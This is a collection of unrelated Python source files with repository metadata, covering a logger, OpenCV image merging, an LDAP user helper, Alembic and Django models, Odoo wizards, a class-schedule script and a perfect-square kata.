25f57628f67d79914ee5503f127fa52f25876ffe | 424 | py | Python | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 25 | 2020-06-09T01:25:14.000Z | 2021-12-22T10:47:18.000Z | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 7 | 2020-06-21T08:32:26.000Z | 2021-08-04T08:39:10.000Z | utils/logger.py | FFTYYY/RoR_relation_extraction | a099e98f3708a39debeed4dc522ff57c4f6b960d | [
"MIT"
] | 3 | 2020-06-18T16:47:31.000Z | 2021-08-10T01:04:16.000Z | from .watch_time import time_str
import fitlog
class Logger:
def __init__(self , fil_path = None):
self.log_fil = open(fil_path , "w" , encoding = "utf-8")
def nolog(self , cont = ""):
pass
def log_print(self , cont = ""):
self.log_fil.write(cont + "\n")
self.log_fil.flush()
print (cont)
fitlog.add_to_line(cont)
def log_print_w_time(self , cont = ""):
self.log_print(str(cont) + " | " + time_str())
| 21.2 | 58 | 0.650943 | 374 | 0.882075 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.058962 |
25f9db8faaa586dceb7f4e9535befcaf68ab201f | 1,798 | py | Python | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | null | null | null | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | null | null | null | tools/mytools/merge_layer.py | tiger0421/DDRNet.pytorch | 138cdc61c4cb00104f5051a129c31d603efb02ed | [
"MIT"
] | 1 | 2021-09-14T15:19:04.000Z | 2021-09-14T15:19:04.000Z | import cv2
import numpy as np
import os
under_layer_path = '/home/ubuntu/share/cam_lidar/Tu_indoor/red2'
upper_layer_path = "/home/ubuntu/share/cam_lidar/Tu_indoor/aisle02_dir"
target_files = os.listdir(upper_layer_path)
target_imgs = [f for f in target_files if os.path.isfile(os.path.join(upper_layer_path, f))]
try:
target_imgs.remove(".DS_Store")
except ValueError:
pass
lower = np.array([0, 0, 128])
upper = np.array([0, 0, 128])
target_colors = np.array([
[0, 0, 0],
[192, 0, 0],
[128, 64, 128],
[0, 0, 128],
[0, 64, 64],
[128, 128, 192],
[128, 0, 64],
[128, 128, 128],
])
for img_name in target_imgs:
base_img = cv2.imread(os.path.join(under_layer_path, img_name), cv2.IMREAD_COLOR)
result_img = np.zeros(base_img.shape, dtype=base_img.dtype)
img_mask = cv2.inRange(base_img, lower, upper)
img_mask_color = cv2.bitwise_and(base_img, base_img, mask=img_mask)
result_img = cv2.add(result_img, img_mask_color)
cv2.imwrite("result.png", result_img)
target_img = cv2.imread(os.path.join(upper_layer_path, img_name), cv2.IMREAD_COLOR)
for color in target_colors:
img_mask = cv2.inRange(target_img, color, color)
img_mask_inv = cv2.bitwise_not(img_mask)
img_mask_color = cv2.bitwise_and(target_img, target_img, mask=img_mask)
result_img = cv2.bitwise_and(result_img, result_img, mask=img_mask_inv)
result_img = cv2.add(result_img, img_mask_color)
print(os.path.join(upper_layer_path, img_name[:-3]) + "png")
cv2.imwrite(os.path.join(upper_layer_path, img_name[:-3] + "png"), result_img)
| 39.086957 | 92 | 0.627364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 130 | 0.072303 |
25fb9da113f8ffe313c22811acf787eb03963979 | 2,233 | py | Python | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/share/nslcd-utils/users.py | sotaoverride/backup | ca53a10b72295387ef4948a9289cb78ab70bc449 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# users.py - functions for validating the user to change information for
#
# Copyright (C) 2013 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
import getpass
import os
import pwd
import sys
class User(object):
def __init__(self, username):
self.myuid = os.getuid()
if username:
userinfo = pwd.getpwnam(username)
else:
self.asroot = False
userinfo = pwd.getpwuid(self.myuid)
(self.username, self.password, self.uid, self.gid, self.gecos,
self.homedir, self.shell) = userinfo
# if we are trying to modify another user we should be root
self.asroot = self.myuid != self.uid
def check(self):
"""Check if the user we want to modify is an LDAP user and whether
we may modify the user information."""
if self.asroot and self.myuid != 0:
print("%s: you may not modify user '%s'.\n" %
(sys.argv[0], self.username))
sys.exit(1)
# FIXME: check if the user is an LDAP user
def get_passwd(self):
"""Ask and return a password that is required to change the user."""
# FIXME: only ask the password if we require it
# (e.g. when root and nslcd has userpwmoddn we don't need to)
return getpass.getpass(
'LDAP administrator password: '
if self.asroot else
'LDAP password for %s: ' % self.username
)
# FIXME: check if the provided password is valid
| 36.606557 | 76 | 0.652485 | 1,324 | 0.592924 | 0 | 0 | 0 | 0 | 0 | 0 | 1,368 | 0.612629 |
25fbbd609cc07a46c89f0cadbaed9a2029ec86bf | 1,739 | py | Python | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | """web dev chapter3 quiz total score
Revision ID: 00f001a958b1
Revises: b95f0132b231
Create Date: 2022-03-02 11:57:04.695611
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00f001a958b1'
down_revision = 'b95f0132b231'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('web_dev_chapter3_quiz_total_score',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('total_score', sa.String(length=64), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('student_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['student_id'], ['student.id'], name=op.f('fk_web_dev_chapter3_quiz_total_score_student_id_student')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_web_dev_chapter3_quiz_total_score'))
)
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'), ['timestamp'], unique=False)
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'), ['total_score'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'))
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'))
op.drop_table('web_dev_chapter3_quiz_total_score')
# ### end Alembic commands ###
| 39.522727 | 130 | 0.748131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 903 | 0.519264 |
25fd8c2e1497e943cb438c2d147ab6c0ea5a6167 | 1,448 | py | Python | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | tsv_to_indexd.py | uc-cdis/aws-batch-index | 1b266bc85bc072b2750d98f733f76f98db566853 | [
"Apache-2.0"
] | null | null | null | import csv
import json
import re
import os
import sys
import requests
import base64
PATH = "./output"
stuff = []
with open("thing.txt", "w+") as r:
for path, dirs, files in os.walk(PATH):
for filename in files:
fullpath = os.path.join(path, filename)
with open(fullpath, "r") as f:
line = f.read()
values = line.split("\t")
link = values[4].split("/")
project = link[3]
if project.startswith("BPA"):
program = "bpa"
proj = project[4:]
elif project.startswith("JFDI"):
program = "JFDI"
proj = project[5:]
# print(program + "-" +proj)
s3 = values[4].split("/")
fName = s3[len(s3) - 1]
dump = json.dumps(
{
"did": values[0],
"acl": [program, proj],
"file_name": fName,
"hashes": {"md5": values[1]},
"size": int(values[2]),
"form": "object",
"urls": [values[4]],
}
)
stuff.append(dump)
r.write(dump)
r.write(",\n")
# print(dump)
# url = 'https://qa-bloodpac.planx-pla.net/index/index/'
| 28.96 | 56 | 0.394337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 222 | 0.153315 |
25fdf69d87de987fb580bb1e6d0df092e266a425 | 1,028 | py | Python | eventup/events/models/events.py | Z-Devs-platzi/backend | 66dc436311c1e5e307c5f32d6a151fb9e5d6e0b8 | [
"MIT"
] | null | null | null | eventup/events/models/events.py | Z-Devs-platzi/backend | 66dc436311c1e5e307c5f32d6a151fb9e5d6e0b8 | [
"MIT"
] | 15 | 2020-08-23T18:40:49.000Z | 2022-03-12T00:46:49.000Z | eventup/events/models/events.py | Z-Devs-platzi/event_up-backend | 2b03a87e220cf4d68c4c2c2067096926d6f19b37 | [
"MIT"
] | null | null | null | ''' Events Model '''
import uuid
from django.db import models
# Utils Model
from eventup.utils.models import GeneralModel
class Event(GeneralModel):
''' Event Model '''
# Id
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
# Event data
name = models.CharField(max_length=100, unique=True)
date = models.DateTimeField(null=True, blank=True)
description = models.CharField(max_length=500)
url = models.URLField()
banner_img = models.ImageField(
'banner picture',
upload_to='banner/pictures/',
blank=True,
null=True
)
banner_title = models.CharField(max_length=300, blank=True)
# Event Relations
template = models.ForeignKey(
to="event_templates.Template",
on_delete=models.SET_NULL,
null=True,
)
sponsor = models.ManyToManyField(
to="Sponsor",
)
schedule = models.ManyToManyField(
to="Schedule",
)
def __str__(self):
return str(self.name)
| 23.363636 | 79 | 0.64786 | 901 | 0.876459 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.159533 |
25fe13f7f1b8a734018f17979a1574c47e8eb30b | 3,198 | py | Python | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | tests/test_api/test_project.py | orf/polyaxon-schemas | dce55df25ae752fc3fbf465ea53add126746d630 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import uuid
from unittest import TestCase
from hestia.tz_utils import local_now
from marshmallow import ValidationError
from tests.utils import assert_equal_dict
from polyaxon_schemas.api.experiment import ExperimentConfig
from polyaxon_schemas.api.group import GroupConfig
from polyaxon_schemas.api.project import ProjectConfig
class TestProjectConfigs(TestCase):
def test_validate_project_name_config(self):
config_dict = {"name": "test sdf", "description": "", "is_public": True}
with self.assertRaises(ValidationError):
ProjectConfig.from_dict(config_dict)
def test_project_config(self):
config_dict = {
"name": "test",
"description": "",
"is_public": True,
"has_code": True,
"has_tensorboard": True,
"tags": ["foo"],
"num_experiments": 0,
"num_independent_experiments": 0,
"num_experiment_groups": 0,
"num_jobs": 0,
"num_builds": 0,
"created_at": local_now().isoformat(),
"updated_at": local_now().isoformat(),
}
config = ProjectConfig.from_dict(config_dict)
config_to_dict = config.to_dict()
config_to_dict.pop("id", None)
config_to_dict.pop("experiment_groups", None)
config_to_dict.pop("experiments", None)
config_to_dict.pop("has_notebook", None)
config_to_dict.pop("unique_name", None)
config_to_dict.pop("user", None)
config_to_dict.pop("owner", None)
config_to_dict.pop("uuid", None)
assert config_to_dict == config_dict
config_dict.pop("description")
config_dict.pop("updated_at")
config_dict.pop("has_code")
config_to_dict = config.to_light_dict()
config_to_dict.pop("has_notebook", None)
config_to_dict.pop("unique_name", None)
assert config_to_dict == config_dict
config_to_dict = config.to_dict(humanize_values=True)
assert config_to_dict.pop("created_at") == "a few seconds ago"
assert config_to_dict.pop("updated_at") == "a few seconds ago"
config_to_dict = config.to_light_dict(humanize_values=True)
assert config_to_dict.pop("created_at") == "a few seconds ago"
def test_project_experiments_and_groups_config(self):
uuid_value = uuid.uuid4().hex
config_dict = {
"name": "test",
"description": "",
"is_public": True,
"experiment_groups": [
GroupConfig(
content="content", uuid=uuid_value, project=uuid_value
).to_dict()
],
"experiments": [
ExperimentConfig(uuid=uuid_value, project=uuid_value).to_dict()
],
}
config = ProjectConfig.from_dict(config_dict)
assert_equal_dict(config_dict, config.to_dict())
config_dict.pop("description")
config_dict.pop("experiment_groups")
config_dict.pop("experiments")
assert_equal_dict(config_dict, config.to_light_dict())
| 36.758621 | 80 | 0.634459 | 2,773 | 0.867104 | 0 | 0 | 0 | 0 | 0 | 0 | 617 | 0.192933 |
25fef9ef873e5740a2ff06f1845a4837d7c9fc74 | 916 | py | Python | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
class AssignMechanicWizard(models.TransientModel):
_name = 'assign.mechanic.wizard'
_description = 'Assign Mechanic Wizard'
# relations
mechanic_ids = fields.Many2many('hr.employee', string="Assign Mechanic")
repair_id = fields.Many2one("repair.order")
def assign_mechanic(self):
"""
Assign mechanic to the repair.order.
"""
self.repair_id.mechanic_ids = [(6, 0, self.mechanic_ids.ids)]
return True
class AssignBayWizard(models.TransientModel):
_name='assign.bay.wizard'
_description = 'Assign Bay Wizard'
# relations
bay_id = fields.Many2one("bay", "Bay")
repair_id = fields.Many2one("repair.order")
def assign_bay(self):
"""
Assign bay to the repair.order.
"""
self.repair_id.assign_bay_id = self.bay_id
return True | 27.757576 | 76 | 0.648472 | 848 | 0.925764 | 0 | 0 | 0 | 0 | 0 | 0 | 314 | 0.342795 |
25ffe35e8c78cb6840c07e1ba30975649c994db9 | 1,077 | py | Python | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | 1 | 2021-05-11T12:09:00.000Z | 2021-05-11T12:09:00.000Z | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | null | null | null | python_to_you/models/profile.py | jacksonsr45/python_to_you | f0016e0450f3f2a4ba1f592baff8a9c28ffeaec7 | [
"MIT"
] | null | null | null | import datetime
from python_to_you.extensions.database import db
from sqlalchemy_serializer import SerializerMixin
class Profile(db.Model, SerializerMixin):
__tablename__ = 'profiles'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.ForeignKey('users.id', ondelete="CASCADE"))
addresses_id = db.Column(db.ForeignKey('addresses.id', ondelete="CASCADE"))
name = db.Column(db.String(255))
last_name = db.Column(db.String(255))
phone = db.Column(db.String(255))
social_media = db.Column(db.String(255))
created_at = db.Column(db.DateTime(), default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime())
class ProfilePicture(db.Model, SerializerMixin):
__tablename__ = 'profiles_images'
id = db.Column(db.Integer, primary_key=True)
profile_id = db.Column(db.ForeignKey('profiles.id', ondelete="CASCADE"))
title = db.Column(db.String(255))
path = db.Column(db.String(255))
created_at = db.Column(db.DateTime(), default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime()) | 41.423077 | 79 | 0.724234 | 957 | 0.888579 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.084494 |
d303609067dd385ae7d7e794011ee33a46b6f186 | 861 | py | Python | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | from ..fuzzable import Fuzzable
class Simple(Fuzzable):
"""Simple bytes value with manually specified fuzz values only.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: Raw, optional
:param default_value: Raw static data
:type fuzz_values: list, optional
:param fuzz_values: List of fuzz values, defaults to None. If empty, Simple is equivalent to Static.
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(self, name=None, default_value=None, fuzz_values=None, *args, **kwargs):
super(Simple, self).__init__(name=name, default_value=default_value, fuzz_values=fuzz_values, *args, **kwargs)
| 43.05 | 120 | 0.724739 | 826 | 0.95935 | 0 | 0 | 0 | 0 | 0 | 0 | 588 | 0.682927 |
d303c2dafa1f17c348ddee3c99adecf98990c23e | 12,671 | py | Python | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | #schedule.py
#importing time
import time
#Making time readable format
clock = (time.ctime())
hour = clock[11:13]
minute = clock[14:16]
currenttime = 60*int(hour) + int(minute)
day = clock[0:3]
print (currenttime)
print (clock)
#IDK why this is here
whatclass = ("none")
#used to read White and Gold week Value
def readwg():
global wg
wgweek = open("wgweekfile.txt","r")
wg = wgweek.read()
wgweek.close()
#Used to wirte white and gold value
def changewg(value):
print("ok")
wgweek_write = open("wgweekfile.txt","w")
wgweek_write.write(str(value))
wgweek_write.close()
changewg = ("false")
# Checks whether this is the first run (sentinel value 3) and, if so,
# prompts the user to initialise the white/gold week value.
def checkfirstrun():
    """Prompt for and persist a white/gold value when ``wg`` is the sentinel "3"."""
    if str(wg) == str(3):
        print("hi")
        new_value = input("Please set white and gold ")
        changewg(new_value)
# Class schedules as (start, end, label) interval tables, keyed by the
# white/gold week value ("0" / "1") and weekday abbreviation.
#
# Interval bounds are *exclusive* on both ends (start < t < end), exactly
# mirroring the original chained `currenttime < hi and currenttime > lo`
# comparisons (including the tiny gaps between e.g. 508.8 and 508.9).
# Label typos ("Peorid", "Bulding", "Activites") are preserved on purpose:
# they are runtime strings that users of the output may match on.
#
# BUG FIX: the original compared `str(wg) == (0)` / `(1)` -- a string against
# an int, which is always False in Python 3 -- so the day schedules were
# unreachable and `whatclass` was always set to "none". The lookup is now
# keyed on the strings "0"/"1".
_MONDAY_SCHEDULE = [
    (420, 480, "Building Open"), (480, 508.8, "4th Period"),
    (508.9, 540, "Advisory"), (540, 569.4, "5th Period"),
    (569.5, 611.4, "Activites"), (611.5, 666, "6th Period"),
    (666.1, 684, "Lunch"), (684.1, 738.6, "7th Peorid"),
    (738.7, 793.2, "1st Peorid"), (793.3, 794.6, "Afternoon Break"),
    (794.7, 856.2, "2nd Peorid"), (856.3, 912, "3rd Peorid"),
]

_SCHEDULES = {
    "0": {
        "Mon": _MONDAY_SCHEDULE,
        "Tue": [(420, 480, "Building Open"), (480.1, 547.1, "1st Period"),
                (547.2, 553.2, "Advisory"), (553.3, 565.2, "Activities"),
                (565.3, 634.2, "2nd Period"), (634.2, 676.1, "Lunch"),
                (676.2, 745.2, "3rd Period"), (745.3, 814.2, "4th Period"),
                (814.3, 843.0, "Afternoon Break"), (843.1, 912.0, "5th Period")],
        "Wed": [(420, 540, "Building Open"), (540.1, 605.4, "6th Period"),
                (605.5, 611.4, "Advisory"), (611.5, 667.1, "X Period"),
                (667.2, 682.1, "Lunch"), (682.2, 749.4, "7th Period"),
                (749.5, 840.6, "1st Period"), (840.7, 845.4, "Afternoon Break"),
                (845.5, 912.0, "2nd Period")],
        "Thu": [(420, 480, "Bulding Open"), (480.1, 547.1, "3rd Period"),
                (547.2, 553.2, "Advisory"), (553.3, 565.2, "Activities"),
                (565.3, 634.2, "4th Period"), (634.2, 676.1, "Lunch"),
                (676.2, 745.2, "5th Period"), (745.3, 814.2, "6th Period"),
                (814.3, 843.0, "Afternoon Break"), (843.1, 912.0, "7th Period")],
        "Fri": [(420, 480, "Building Open"), (480, 508.8, "5th Period"),
                (508.9, 540, "Advisory"), (540, 569.4, "6th Period"),
                (569.5, 611.4, "Activites"), (611.5, 666, "7th Period"),
                (666.1, 684, "Lunch"), (684.1, 738.6, "1st Peorid"),
                (738.7, 793.2, "2nd Peorid"), (793.3, 794.6, "Afternoon Break"),
                (794.7, 856.2, "3rd Peorid"), (856.3, 912, "4th Peorid")],
    },
    "1": {
        "Mon": _MONDAY_SCHEDULE,
        "Tue": [(420, 480, "Building Open"), (480.1, 547.1, "5th Period"),
                (547.2, 553.2, "Advisory"), (553.3, 565.2, "Activities"),
                (565.3, 634.2, "6th Period"), (634.2, 676.1, "Lunch"),
                (676.2, 745.2, "7th Period"), (745.3, 814.2, "1st Period"),
                (814.3, 843.0, "Afternoon Break"), (843.1, 912.0, "2nd Period")],
        "Wed": [(420, 540, "Building Open"), (540.1, 605.4, "3rd Period"),
                (605.5, 611.4, "Advisory"), (611.5, 667.1, "X Period"),
                (667.2, 682.1, "Lunch"), (682.2, 749.4, "4th Period"),
                (749.5, 840.6, "5th Period"), (840.7, 845.4, "Afternoon Break"),
                (845.5, 912.0, "6th Period")],
        "Thu": [(420, 480, "Bulding Open"), (480.1, 547.1, "7th Period"),
                (547.2, 553.2, "Advisory"), (553.3, 565.2, "Activities"),
                (565.3, 634.2, "1st Period"), (634.2, 676.1, "Lunch"),
                (676.2, 745.2, "2nd Period"), (745.3, 814.2, "3rd Period"),
                (814.3, 843.0, "Afternoon Break"), (843.1, 912.0, "4th Period")],
        "Fri": [(420, 480, "Building Open"), (480, 508.8, "2nd Period"),
                (508.9, 540, "Advisory"), (540, 569.4, "3rd Period"),
                (569.5, 611.4, "Activites"), (611.5, 666, "4th Period"),
                (666.1, 684, "Lunch"), (684.1, 738.6, "5th Peorid"),
                (738.7, 793.2, "6th Peorid"), (793.3, 794.6, "Afternoon Break"),
                (794.7, 856.2, "7th Peorid"), (856.3, 912, "1st Peorid")],
    },
}


def getclass():
    """Set the global ``whatclass`` to the class currently in session.

    Reads the globals ``wg`` (white/gold week marker, "0" or "1"),
    ``day`` (weekday abbreviation from time.ctime()) and ``currenttime``
    (minutes since midnight).

    Behaviour mirrors the original if/elif ladder:
    - unknown ``wg`` -> ``whatclass`` is set to "none";
    - known ``wg`` but no matching interval -> ``whatclass`` is left as-is;
    - weekend (day not in the table) before minute 912.1 -> the week marker
      is flipped via ``changewg``.
    """
    global whatclass
    week = _SCHEDULES.get(str(wg))
    if week is None:
        whatclass = ("none")
        return
    periods = week.get(day)
    if periods is not None:
        for start, end, label in periods:
            if start < currenttime < end:
                whatclass = label
                break
    elif currenttime < 912.1:
        # End of a weekend: alternate the white/gold week marker.
        changewg(1 if str(wg) == "0" else 0)
# Main loop: refresh the clock, re-read the white/gold marker, and report the
# class currently in session once a minute.
while True:
    # FIX: the original computed clock/currenttime/day once at import, so the
    # reported class never advanced; refresh them every cycle instead.
    clock = (time.ctime())
    hour = clock[11:13]
    minute = clock[14:16]
    currenttime = 60*int(hour) + int(minute)
    day = clock[0:3]
    # Read the persisted white/gold week value.
    readwg()
    # First-run setup prompt if needed.
    checkfirstrun()
    # Determine the current class.
    getclass()
    print(whatclass)
    # Sleep a minute so the loop does not spam.
    time.sleep(60)
| 45.253571 | 61 | 0.531529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,756 | 0.138584 |
d306731d5628f849cd0f722161fc760de645252f | 77 | py | Python | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | from .nodes import Host, HostSchema, Session, SessionSchema, Project, SSHKey
| 38.5 | 76 | 0.805195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d3069280ed59ec70e2f911b0845f83eda4671be0 | 973 | py | Python | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | """
https://www.codewars.com/kata/56269eb78ad2e4ced1000013/train/python
Given an int, return the next 'integral perfect square', which is an integer n such that sqrt(n) is also an int.
If the given int is not an integral perfect square, return -1.
"""
def find_next_square(sq: int) -> int:
    """Return the next integral perfect square after *sq*, or -1.

    If *sq* equals n**2 for some integer n >= 0, returns (n + 1)**2;
    otherwise returns -1. Raises ValueError for negative input.

    FIX: uses integer math (math.isqrt) instead of the original float
    ``sq ** (1/2)``, which loses precision and returns wrong answers for
    perfect squares larger than about 2**52.
    """
    from math import isqrt

    root = isqrt(sq)
    return (root + 1) ** 2 if root * root == sq else -1
def find_next_square2(sq: int) -> int:
    """Compact variant of find_next_square.

    Returns the next perfect square when *sq* is itself a perfect square
    (judged via float square root), otherwise -1.
    """
    root = sq ** 0.5
    if root % 1 != 0:
        return -1
    return int((root + 1) ** 2)
def find_next_square3(sq: int) -> int:
    """Variant using float.is_integer() to detect perfect squares.

    Returns (sqrt(sq) + 1)**2 when *sq* is a perfect square, else -1.
    """
    root = sq ** 0.5
    if not root.is_integer():
        return -1
    return int((root + 1) ** 2)
# Quick demo of the three variants; expected outputs noted inline.
print(find_next_square3(4)) # 9
print(find_next_square3(121)) # 144
print(find_next_square3(625)) # 676
print(find_next_square3(114)) # -1
| 26.297297 | 112 | 0.644399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 391 | 0.40185 |
d30a1906d50b139c0bbc67c894830907d3ce4a76 | 483 | py | Python | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 6 | 2017-07-13T21:09:24.000Z | 2021-12-09T16:52:01.000Z | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 1 | 2021-06-01T20:08:03.000Z | 2021-06-01T20:08:03.000Z | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 16 | 2017-07-16T03:02:38.000Z | 2022-02-26T19:30:00.000Z | #! /usr/bin/env python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
    """Copy the centre/nadir coordinates from each Overlay's ``extras`` blob
    onto first-class model fields, then save the overlay.

    One-off data migration over every Overlay row.
    """
    for overlay in Overlay.objects.all():
        # Promote each coordinate from the extras container to the model field.
        for field in ("centerLat", "centerLon", "nadirLat", "nadirLon"):
            setattr(overlay, field, getattr(overlay.extras, field))
        overlay.save()
# Execute the one-off migration immediately when the script runs.
moveCenterPtOutOfExtras()
d30a5c4ca313464e5235db512ad065b7b5f40078 | 11,087 | py | Python | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
] | null | null | null | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
